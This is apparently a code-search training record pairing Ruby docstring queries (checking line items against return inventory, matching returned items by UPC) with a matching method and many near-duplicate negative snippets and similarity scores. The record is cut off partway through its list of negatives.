"0.6968911",
"0.6963535",
"0.6954585",
"0.69528514",
"0.6948162",
"0.6930429",
"0.69233763",
"0.69218826",
"0.690065",
"0.6884273",
"0.6855263",
"0.685458",
"0.68540275",
"0.6846199",
"0.6838092",
"0.6833333",
"0.6815059",
"0.6813867",
"0.68005466",
"0.67807406",
"0.6771664",
"0.67700243",
"0.6769703",
"0.6758894",
"0.673104",
"0.67273796",
"0.67267025",
"0.67119735",
"0.6706396",
"0.67027986",
"0.6690206",
"0.6679189",
"0.66706085",
"0.66702294",
"0.6667477",
"0.6664319",
"0.66589975",
"0.6655174",
"0.6649008",
"0.6646847",
"0.6646847",
"0.66436744",
"0.6630665",
"0.6621706",
"0.6621706",
"0.66204774",
"0.6603555",
"0.66001666",
"0.66001666",
"0.6599439",
"0.65988094",
"0.6586193",
"0.6584623",
"0.6581972",
"0.65750676",
"0.65746117",
"0.65675044",
"0.6559254",
"0.65515125",
"0.6550668"
] | 0.0 | -1 |
Check whether the line item exists in the inventories; if it does, mark the 3PL on the line_item. | def check_line_item_in_inventory(line_item)
  # Feature flipper: when :refulfill is inactive, skip the inventory check entirely.
if Features.inactive?(:refulfill)
return true
end
found = false
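  # Look up a matching return inventory item; the helper's name suggests it also decrements availability.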
if rii = find_match_and_decrement_available(line_item)
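    # Route by destination: US orders refulfill from the bergen vendor, Australian orders from next.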
if line_item.order.shipping_address.country.name == 'United States' && rii.vendor == 'bergen'
line_item.return_inventory_item = rii
line_item.refulfill_status = 'new'
found = true
line_item.save
elsif line_item.order.shipping_address.country.name == 'Australia' && rii.vendor == 'next'
line_item.return_inventory_item = rii
line_item.refulfill_status = 'new'
found = true
line_item.save
end
end
found
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def has_line_item?\n true\n end",
"def has_line_items?\n line_items.any?\n end",
"def line_item_items_exist_in_inventory\n self.line_items.each do |line_item|\n next unless line_item.item\n inventory_item = self.from.inventory_items.find_by(item: line_item.item)\n if inventory_item.nil?\n errors.add(:inventory,\n \"#{line_item.item.name} is not available \" \\\n \"at this storage location\")\n end\n end\n end",
"def has_line_item?(id)\n\t\tself.order_line_items.each do |item|\n\t\t\treturn true if item.product_id == id\n\t\tend\n\t\treturn false\n\tend",
"def ensure_not_referenced_by_any_line_item \n if line_items.count.zero?\n return true\n else\n errors[:base] << \"Line Items present!\"\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n\tif line_items.count.zero?\nreturn true\nelse\nerrors[:base] << \"Line Items present\"\nreturn false\nend\nend",
"def ensure_not_referenced_by_any_line_item\n \t\tif line_items.empty?\n \t\t\treturn true\n \t\telse\n \t\t\terrors.add(:base, 'Existe linha de item')\n\t\t \treturn false\n \t\tend\n \tend",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Existuju polozky')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\nif line_items.count.zero?\nreturn true\nelse\nerrors[:base] << \"Line Items present\"\nreturn false\nend\nend",
"def ensure_not_referenced_by_any_line_item\n if line_items.count.zero?\n return true\n else\n errors[:base] << \"Line Items present\" #这是什么意思\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n\nif line_items.count.zero?\nreturn true\nelse\nerrors[:base] << \"Line Items present\"\nreturn false\nend\nend",
"def match?(line_item)\n @product_ids.include?(line_item.variant.product.id)\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.count.zero?\n return true\n else\n errors[:base] << \"Line Items present\"\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n\tif line_items.count.zero?\nreturn true\nelse\nerrors.add(:base, 'Line Items present' )\nreturn false\n end\nend",
"def ensure_not_referenced_by_any_line_item\n if line_items.count.zero?\n return true\n else\n errors[:base] << \"Line Items present\"\n return false\n end \n end",
"def ensure_not_referenced_by_any_line_item \n\t\tif line_items.empty?\n\t\t\treturn true \n\t\telse\n\t\t\terrors.add(:base, 'Line Items present')\n\t\treturn false\n\t\tend\n\tend",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Istnieja powiazania z Line Items')\n return false;\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item \n \tif line_items.empty?\n return true \n else\n errors.add(:base, 'Line Items present')\n return false \n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n\n if line_items.count.zero?\n return true\n else\n errors[:base] << \"Line Items present\"\n return false\n\nend\nend",
"def ensure_not_referenced_by_any_line_item\n if line_item1s.count.zero?\n return true\n else\n errors[:base] << \"Line Items present\"\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n\tif line_items.empty?\n \t return true\n \telse\n \t errors.add(:base, 'Line Items present' )\n \treturn false\n \tend\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n\t return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n \tif line_items.empty?\n \t\treturn true\n \telse\n \t\terrors.add(:base, 'Line Items present')\n \t\treturn false\n \tend \t\t\n end",
"def ensure_not_referenced_by_any_line_item\n\t if line_items.count.zero?\n\t\t return true\n\t else\n\t\t errors[:base] << \"Line Items present\"\n\t\t return false\n\t end\n\tend",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, \"Line items exist\")\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n\t\tif line_items.empty?\n\t\t\treturn true\n\t\telse\n\t\t\terrors.add(:base, 'Product sedang di referensikan oleh Line Item')\n\t\t\treturn false\n\t\tend\n\tend",
"def ensure_not_referenced_by_any_line_item\n if line_items.count.zero?\n return true\n else\n errors[:base] << \"Line Items present\"\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item \n if line_items.empty?\n return true \n else\n errors.add(:base, 'Line Items present')\n return false \n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n \t if line_items.empty?\n \t \treturn true\n \t else\n \t \terrors.add(:base, 'Line items present')\n \t \treturn false\n \t end\n \tend",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n\t\tif line_items.empty?\n\t\t return true\n\t \telse\n\t \t errors.add(:base, 'Line Items present')\n\t return false\n\t end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item \n if line_items.empty? \n return true \n else \n errors.add(:base, 'Line Items present') \n return false \n end \n end",
"def ensure_not_referenced_by_any_line_item\n\tif line_items.count.zero?\n\treturn true\n\telse\n\terrors[:base] << \"Line Items present\"\n\treturn false\n\tend\nend",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item \n if line_items.empty?\n return true \n else\n errors.add(:base, 'Line Items present')\n return false \n end\n end",
"def ensure_not_referenced_by_any_line_item\n\t\tif line_items.emty?\n\t\t\treturn true\n\t\tesle\n\t\t\terrors.add(:base, 'Line Items present')\n\t\t\treturn false\n\t\tend\n\tend",
"def ensure_not_referenced_by_any_line_item\n\t\t\tif line_items.empty?\n\t\t\t\treturn true \n\t\t\telse\n\t\t\t\terrors.add(:base, 'Line Items present')\n\t\t\t\treturn false \n\t\t\tend\n\t\tend",
"def ensure_not_referenced_by_any_line_item\n\t\tif line_items.count.zero?\n\t\t\treturn true\n\t\telse\n\t\t\terrors[:base] << \"Line Items present\"\n\t\t\treturn false\n\t\tend\n\tend",
"def ensure_not_referenced_by_any_line_item \n if line_items.empty?\n return true \n else\n errors.add(:base, 'Line Items present')\n return false \n end\n end",
"def ensure_not_referenced_by_any_line_item\n\t\tif line_items.count.zero?\n\t\t\treturn true\n\t\telse\n\t\t\terrors[:base] << \"Line Items Prsent\"\n\t\t\treturn false\n\t\tend\n\tend",
"def match?(line_item)\n @variant_ids.include?(line_item.variant.id)\n end",
"def test_show_if_has_line_item\n assert_equal @order.has_line_item?(@order.order_line_items.find_by_name(items(:towel).name).id), true\n\n # Create a new order and put just one line item.\n new_order_line_item = OrderLineItem.for_product(items(:small_stuff))\n new_order = Order.new\n new_order.order_line_items << new_order_line_item\n assert new_order.save\n \n # Search for an existent line item of ANOTHER order.\n assert_equal @order.has_line_item?(new_order.order_line_items.find_by_name(items(:small_stuff).name).id), false\n end",
"def ensure_not_referenced_by_any_line_item\n\t\tif line_items.count.zero?\n\t\t\treturn true\n\t\t\telse\n\t\t\terrors.add(:base, 'Line Items present' )\n\t\t\treturn false\n\t\t\tend\n\tend",
"def ensure_not_referenced_by_any_line_item\n if line_items.count.zero?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.count.zero?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.count.zero?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n\tif line_items.empty?\n\treturn true\n\telse\n\terrors.add(:base, 'Line Items present')\n\treturn false\n\tend\n\tend",
"def ensure_not_referenced_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n\t\tif line_items.count.zero?\n\t\t\treturn true\n\t\telse\n\t\t\terrors.add(:base, 'Line Items present' )\n\t\t\treturn false\n\t\tend\n\tend",
"def ensure_not_referenced_by_any_line_item\n\t\tif line_items.count.zero?\n\t\t\treturn true\n\t\telse\n\t\t\terrors.add(:base, 'Line Items present' )\n\t\t\treturn false\n\t\tend\n\tend",
"def ensure_not_referenced_by_any_line_item\n \tif line_items.empty?\n \t\treturn true\n \telse\n \t\terrors.add(:base, 'Line Items Present')\n \t\treturn false\n \tend\n end",
"def ensure_not_referenced_by_any_line_item # hook method (a method that Rails calls automatically at a given point in an object’s life)\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n\t\tif line_items.count.zero?\n\t\t\treturn true\n\t\telse\n\t\t\terrors.add(:base, 'Line Items present')\n\t\t\treturn false\n\t\tend\n\tend",
"def ensure_not_referenced_by_any_line_item\n\t\tif line_items.empty?\n\t\t\treturn true\n\t\telse\n\t\t\terrors.add(:base, 'Line items present')\n\t\t\treturn false\n\t\tend\n\tend",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n\tif line_items.empty?\n\treturn true\n\telse\n\terrors.add(:base, 'Line Items present')\n\treturn false\n\tend\nend",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n if line_items.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_item_line\n if item_lines.empty?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\nend",
"def ensure_not_referenced_by_any_line_item\n if line_items.count.zero?\n return true\n else\n errors.add(:base, 'Line Items present')\n return false\n end\n end",
"def ensure_not_referenced_by_any_line_item\n\t\tif line_items.empty?\n\t\t\treturn true\n\t\telse\n\t\t\terrors.add(:base, 'Line Items present')\n\t\t\treturn false\n\t\tend\n\tend",
"def ensure_not_referenced_by_any_line_item\n\t\tif line_items.empty?\n\t\t\treturn true\n\t\telse\n\t\t\terrors.add(:base, 'Line Items present')\n\t\t\treturn false\n\t\tend\n\tend",
"def ensure_not_referenced_by_any_line_item\n\t\tif line_items.empty?\n\t\t\treturn true\n\t\telse\n\t\t\terrors.add(:base, 'Line Items present')\n\t\t\treturn false\n\t\tend\n\tend"
] | [
"0.7575127",
"0.72356254",
"0.71560377",
"0.7098415",
"0.7065873",
"0.7059247",
"0.7028707",
"0.6990496",
"0.69901574",
"0.6968333",
"0.6947016",
"0.69288427",
"0.6928456",
"0.6886449",
"0.68685293",
"0.68636286",
"0.6862128",
"0.6854091",
"0.68417156",
"0.68411756",
"0.68411756",
"0.68411756",
"0.6840865",
"0.6837888",
"0.6836572",
"0.6820581",
"0.6818721",
"0.68098813",
"0.6807094",
"0.68061244",
"0.6802275",
"0.6800887",
"0.67996347",
"0.6799503",
"0.6798673",
"0.67898583",
"0.6781821",
"0.6773744",
"0.6770066",
"0.6767985",
"0.6767456",
"0.67655784",
"0.6760843",
"0.6741413",
"0.6739609",
"0.6727146",
"0.6725981",
"0.67252254",
"0.67198867",
"0.67190945",
"0.6711884",
"0.6711884",
"0.6711884",
"0.67079145",
"0.6707558",
"0.67023754",
"0.67023754",
"0.6702117",
"0.6698879",
"0.66830945",
"0.6678033",
"0.6677241",
"0.6677241",
"0.6677241",
"0.6677241",
"0.6677241",
"0.6677241",
"0.6677241",
"0.6677241",
"0.6677241",
"0.6677241",
"0.6677241",
"0.6677241",
"0.6677241",
"0.6674587",
"0.66739947",
"0.6664716",
"0.66646606",
"0.66646606",
"0.66646606",
"0.66646606",
"0.66646606",
"0.66646606",
"0.66646606",
"0.66646606",
"0.66646606",
"0.66646606",
"0.66646606",
"0.66646606",
"0.66646606",
"0.66646606",
"0.66646606",
"0.66646606",
"0.66646606",
"0.66646606",
"0.6664211",
"0.66639876",
"0.66559213",
"0.66559213",
"0.66559213"
] | 0.7079307 | 4 |
match by UPC first, then try matching via GlobalSku properties; returns the return_inventory_item or nil | def find_match_and_decrement_available(line_item)
gs = Orders::LineItemPresenter.new(line_item).global_sku
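# First attempt: exact match on the GlobalSku id, which is stored as the return item's UPC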
if rii = ReturnInventoryItem.where(["upc = ? and active = true and available > 0", gs&.id]).first
rii.available -= 1
rii.save
elsif gs
# do this check since global skus are jacked up and can't be trusted
gs = GlobalSku.where(
style_number: gs.style_number,
product_name: gs.product_name,
size: gs.size,
color_id: gs.color_id,
customisation_id: gs.customisation_id,
height_value: gs.height_value,
product_id: gs.product_id,
).first
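# Second attempt: retry the UPC match with the freshly resolved GlobalSku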
if rii = ReturnInventoryItem.where(["upc = ? and active = true and available > 0", gs&.id]).first
rii.available -= 1
rii.save
end
end
rii
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def find_item_by_product(product, items)\n\t\tsku = product.sap_sku.to_s.upcase\n\t\tsku_options = sku.match(/\\-?[MV]$/) ? [sku, sku.gsub(/\\-?[MV]$/, '')] : sku_options = [\"#{sku}-V\", \"#{sku}-M\", \"#{sku}V\", \"#{sku}M\", sku]\n\n\t\titem = nil\n\t\tsku_options.each do |s|\n\t\t\tif item = items[s]\n\t\t\t\treturn item\n\t\t\tend\n\t\tend\n\t\titem\n\tend",
"def find(item_name)\n @inventory.find(item_name)\n end",
"def get_item_in_this_state(inventory_item_params, state = nil)\n return nil if (state.nil? || InventoryItemState.find_by(name: state).nil?) #No need to check if the state is nil.\n item_state_id = InventoryItemState.find_by(name: state).id\n\n in_it = InventoryItem.find_by(item_id: inventory_item_params[:item_id],\n location_id: inventory_item_params[:location_id],\n inventory_item_state_id: item_state_id,\n inventory_item_condition_id: inventory_item_params[:inventory_item_condition_id])\n\n return nil if in_it.nil?\n return in_it\n end",
"def assign_inventory_item\n self.inventory_item ||= inventory.item_by_product_and_code(product, lot_code)\n self\n end",
"def unequip_item(item)\n pair = @outfit.detect { |type, value| value.name.casecmp(item.to_s).zero? }\n if pair\n # On a successful find, the \"detect\" method always returns\n # an array of length 2; thus, the following line should not fail.\n item = pair[1]\n item.unequip(self)\n add_item(item)\n else\n print NOT_EQUIPPED_ERROR\n end\n end",
"def find_item(item)\n return nil if cart_items.blank?\n\n item = prepare_for_cart_item(item)\n result = cart_items.detect do |ci|\n ci.type == item.type && ci.unit == item.unit\n end\n return result.nil? ? false : result\n end",
"def find_by(search, category=\"name\")\n #category is a string\n #search is a string\n output = all.select do |item|\n if category == \"moveset\" || category == \"type\"\n nil #forces partial matching\n else\n item.instance_variable_get(\"@#{category}\").downcase.gsub(/\\s+/, \"\") == search.downcase.gsub(/\\s+/, \"\")\n end\n end\n\n #returns the item or nil if not found\n\n if output.size < 1\n output = find_partial(search, category)\n end\n output\n end",
"def find_pet_by_name(pet_shop, pet_name)\n for item in pet_shop[:pets]\n if item[:name] == pet_name\n return item\n end\n end\n return nil\nend",
"def locate(id)\n return self if are_you(id)\n\n # Try Inventory\n i = @inv.fetch(id)\n return i if !i.nil?\n\n return nil\n end",
"def helper(action, targetNoun, itemNoun, entities, inventory)\n target = action[targetNoun]\n if !target.nil? && entities.find { |x| x.to_sym == target.target }\n result = target[itemNoun]\n return [:success, target.target, result.result] if \n (!result.nil? && inventory.find { |x| x.to_sym == itemNoun.to_sym })\n end\n return nil\n end",
"def find_item_by_name_in_collection(name, collection)\n i = 0\n while i < collection.length do\n item_hash = collection[i]\n item_hash[:item] == name ? (return item_hash) : nil\n i += 1\n end\nend",
"def gms_find_code_value_item(items, code_value)\n items.each_item do |item|\n return item if item[CNCS] && item[CNCS].items[0][CV].value == code_value\n end\n\n nil\nend",
"def findVmItem(t, item)\n\tt = t.upcase\n\th = Hash[getFromApi('/api/v1/vmware/vm?is_relic=false&name='+t+'&primary_cluster_id=local')]\n#\tputs h['data'][0][item]\n\treturn h['data'][0][item]\nend",
"def find_item(purchase_or_id)\n raise NotImplementedError\n end",
"def find_single_item(hash,lookup)\n if hash[lookup]==nil\n return nil\n else\n return hash[lookup][:item]\n end\nend",
"def find_pet_by_name(pet_shop, name)\n for pet in pet_shop[:pets]\n if pet[:name] == name\n return pet\n # else\n # return nil\n end\n end\n return\nend",
"def find_item_by_name(list, search_item)\n found_entry = {}\n list.each do |current_item|\n if current_item[\"productName\"] == search_item[\"productName\"]\n found_entry=current_item\n end\n end\n return found_entry\n end",
"def lookup(batch)\n req = Vacuum.new key: 'AKIAJA2IADZPBGHJTZRQ',\n secret: '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',\n tag: @tag,\n locale: 'us'\n \n \n params = { 'Operation' => 'ItemLookup',\n 'SearchIndex' => 'Books',\n 'ItemLookup.Shared.IdType' => 'ISBN',\n 'ItemLookup.Shared.Condition' => 'All',\n 'ItemLookup.Shared.MerchantId' => 'All',\n 'ItemLookup.Shared.ResponseGroup' => 'OfferFull'}\n \n batch.each_with_index do |item,index|\n params['ItemLookup.'+(index+1).to_s+'.ItemId'] = item\n end\n req.build params\n \n res = req.get\n items = []\n if res.valid?\n res.to_hash['Items'].each do |item|\n prod = {}\n prod['ASIN'] = item['Item']['ASIN']\n prod['New Price'] = item['Item']['OfferSummary']['LowestNewPrice']['FormattedPrice']\n prod['Used Price'] = item['Item']['OfferSummary']['LowestUsedPrice']['FormattedPrice']\n prod['url'] = \"http://www.amazon.com/dp/\"+prod['ASIN']+'/?tag='+@tag\n items << prod\n end\n end\n #puts res.to_hash.to_json\n items\nend",
"def fetch_from_inventory(an_order)\n order = extract_code_qty(an_order)\n return Inventory.fetch_an_item(order[:code])\n end",
"def expected_inventory\n result = @inventory.dup\n # TODO DRY this up with `Person#eat`\n result[:fish] -= @daily_appetite = 10\n result\n end",
"def gather_item\n local_item = FoodItem.fetch_local_item @item_id\n return local_item unless local_item.nil?\n\n item_id = @item_id.split('-')\n remote_item = fetch_remote_item item_id[0], item_id[1]\n remote_item = FoodItem.new_item remote_item\n\n return remote_item unless remote_item.nil?\n\n nil # fallback\n end",
"def available_inventory\n object.check_inventory\n end",
"def get_rental_info_by_book_title(searched_title)\n if searched_title == @title\n return @inventory[0][:rental_details]\n else\n return nil\n end\nend",
"def get_item(item)\n return item.move(@inventory)\n end",
"def gh_find_code_value_item(items, code_value)\n items.each_item do |item|\n return item if item[CNCS] && item[CNCS].items[0][CV].value == code_value\n end\n\n nil\nend",
"def determine_item(item_type, item_id)\n case item_type\n \n when \"weapon_id\"\n Weapon.find(item_id) \n when \"armor_id\"\n Armor.find(item_id)\n when \"potion_id\"\n Potion.find(item_id)\n end\n end",
"def check_line_item_in_inventory(line_item)\n # feature flipper\n if Features.inactive?(:refulfill)\n return true\n end\n found = false\n\n if rii = find_match_and_decrement_available(line_item)\n if line_item.order.shipping_address.country.name == 'United States' && rii.vendor == 'bergen'\n line_item.return_inventory_item = rii\n line_item.refulfill_status = 'new'\n found = true\n line_item.save\n elsif line_item.order.shipping_address.country.name == 'Australia' && rii.vendor == 'next'\n line_item.return_inventory_item = rii\n line_item.refulfill_status = 'new'\n found = true\n line_item.save\n end\n end\n found\n end",
"def source_item\n source.item_by_product_and_code(product, lot_code)\n end",
"def upc\n upc_code = params[:upc]\n redirect_to root_url, alert: 'Not a valid UPC' and return unless upc_code\n @item = Item.code_find_or_create_by(upc_code)\n redirect_to root_url, alert: 'No product matches found' and return unless @item.errors.empty?\n redirect_to add_item_to_cart_path(@item.id) and return\n end",
"def test_selectItem\n\t\t#vm = VendingMachine.new\n\t\tvm = VendingMachine.new(@db)\n\t\tvm.output = StringIO.new\n\t\t# vm.items[\"A1\"].quantity = 1\n\t\tvm.inputMoney(0.50)\n\t\titem = vm.selectItem(\"A1\")\n\t\tassert_not_nil(item)\n\t\tassert_equal(\"A1\", item.code)\n\t\tassert_equal(\"Almond Joy\", item.description)\n\tend",
"def find_by_code(code)\n record = fetch(code)\n return unless record\n\n Models::InventoryItem.new(**record.merge(code: code,\n discount: @discounts_rep.find_by_code(code)))\n end",
"def find_pet_by_name(pet_shop, supplied_name)\n for pet in pet_shop[:pets]\n return pet if supplied_name == pet[:name]\n end\n return nil\nend",
"def use_item_by_object(item, e)\n index = has_item_by_object(item)\n if (index != -1)\n actual_item = inventory[index].first\n actual_item.use(e)\n if actual_item.consumable then remove_item(actual_item) end\n else\n print \"What?! You don't have THAT!\\n\\n\"\n end\n end",
"def find_pet_by_name (shop,pet_name)\n for pet in shop[:pets]\n if pet[:name] == pet_name\n return pet\n # else\n end\n end\nend",
"def find_pet_by_name(petshop, name)\n for pet in petshop[:pets]\n if pet[:name] == name\n return pet\n end\n end\n return nil\nend",
"def update_price\n req = Vacuum.new \n req.configure(\n aws_access_key_id: ENV['ACCESS_KEY_ID'],\n aws_secret_access_key: ENV['SECRET_KEY'],\n associate_tag: ENV['ASSOCIATES_ID']\n )\n\n req.associate_tag = 'shop1410f-20'\n\n sleep(1.seconds)\n\n item_id = self.item_id\n\n params = {\n 'IdType' => 'ASIN',\n 'ItemId' => item_id,\n 'ResponseGroup' => 'Offers, Images'\n }\n \n #For Product Price \n res = req.item_lookup(params)\n\n hash = res.to_h\n self.price = hash[\"ItemLookupResponse\"][\"Items\"][\"Item\"][\"Offers\"][\"Offer\"][\"OfferListing\"][\"Price\"][\"FormattedPrice\"]\n self.save\n end",
"def find_item_by_name_in_collection(name, collection)\n collection.each{|items|\n if items[:item] === name\n return items \n end}\n nil\nend",
"def examine(item)\r\n \r\n end",
"def get_item name\n if (@listOfItem)\n @listOfItem.select do |item|\n item.product.name == name\n end.first\n else\n puts \"@listOfItem is null, so can't get an item from this\"\n end\n end",
"def find_pet_by_name(pet_shop, pet_name)\n for pet in pet_shop[:pets]\n return pet if pet[:name] == pet_name\n end\n return nil\nend",
"def find_pet_by_name(pet_shop, name)\n for pet in pet_shop[:pets]\n if pet[:name] == pet\n return pet\n else return nil\n end\nend\nend",
"def find_pet_by_name(pet_shop, pet_name)\n for pet in pet_shop[:pets]\n if pet[:name] == pet_name\n return pet\n end\n end\n return nil\nend",
"def find_pet_by_name(pet_shop, pet_name)\n for pet in pet_shop[:pets]\n if pet[:name] == pet_name\n return pet\n end\n end\n return nil\nend",
"def searched_items\n # search by city_section if that param is passed in (convert city_section string name to key for db lookup first)\n #if params[:city_section]\n # @the_things = DonorPickup.city_section_is(params[:city_section]).paginate(default_pagination_params)\n # return\n #end\n \n \n @the_things = DonorPickup.first_name_like(params[:search_first_name]).\n last_name_like(params[:search_last_name]).\n address_like(params[:search_address]).\n with_state(params[:search_state]).\n with_priority(params[:search_priority]).\n is_pending(params[:search_pending]).\n city_section_is(params[:search_city_section]).\n for_pickup_date_range(params[:search_pickup_time_lowest], params[:search_pickup_time_highest]).\n select{ |dp| params[:search_item_id].blank? ? true : dp.has_this_item?(params[:search_item_id].to_i)}.\n paginate(default_pagination_params)\n \n end",
"def get_matching_item(request)\r\n matching_items= self.overlay.active_items_by_name_and_user(request.name, self)\r\n matching_items[0]\r\n end",
"def find_pet_by_name(pet_shop, pet_name)\n\n for found_pet in pet_shop[:pets]\n if found_pet[:name] == pet_name\n #puts \"I found #{found_pet[:name]}.\"\n return found_pet\n end\n end\n return nil\n # if this is in the loop, it kills the process after only\n # checking the first one.\nend",
"def find_pet_by_name(pet_shop, name)\n pets = pets\n for pet in pet_shop[:pets]\n if pet[:name] == name\n pets = pet\n nil\n end\n end\n return pets\nend",
